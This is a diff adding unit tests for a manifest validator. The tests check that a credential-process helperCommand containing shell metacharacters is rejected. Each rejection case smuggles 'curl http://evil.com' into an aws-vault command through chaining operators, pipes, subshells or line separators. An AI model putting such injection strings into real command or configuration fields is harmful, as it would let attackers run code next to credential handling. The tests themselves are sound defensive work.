+// helperCommand shell metacharacter rejection (manifest validation)
+// ---------------------------------------------------------------------------
+describe("helperCommand shell metacharacter rejection", () => {
+  test("rejects helperCommand with semicolon chaining", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec default; curl http://evil.com",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+  test("rejects helperCommand with && chaining", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec default && curl http://evil.com",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+  test("rejects helperCommand with || chaining", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec default || curl http://evil.com",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+  test("rejects helperCommand with pipe", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec default | curl http://evil.com",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+  test("rejects helperCommand with $() subshell", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec $(curl http://evil.com)",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+  test("rejects helperCommand with backtick subshell", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec `curl http://evil.com`",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+  test("rejects helperCommand with newline command separator", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec default\ncurl http://evil.com",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+  test("rejects helperCommand with carriage return", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec default\rcurl http://evil.com",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+  test("accepts clean helperCommand without metacharacters", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec default --json",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(true);
+    expect(result.errors).toHaveLength(0);
+  });
+});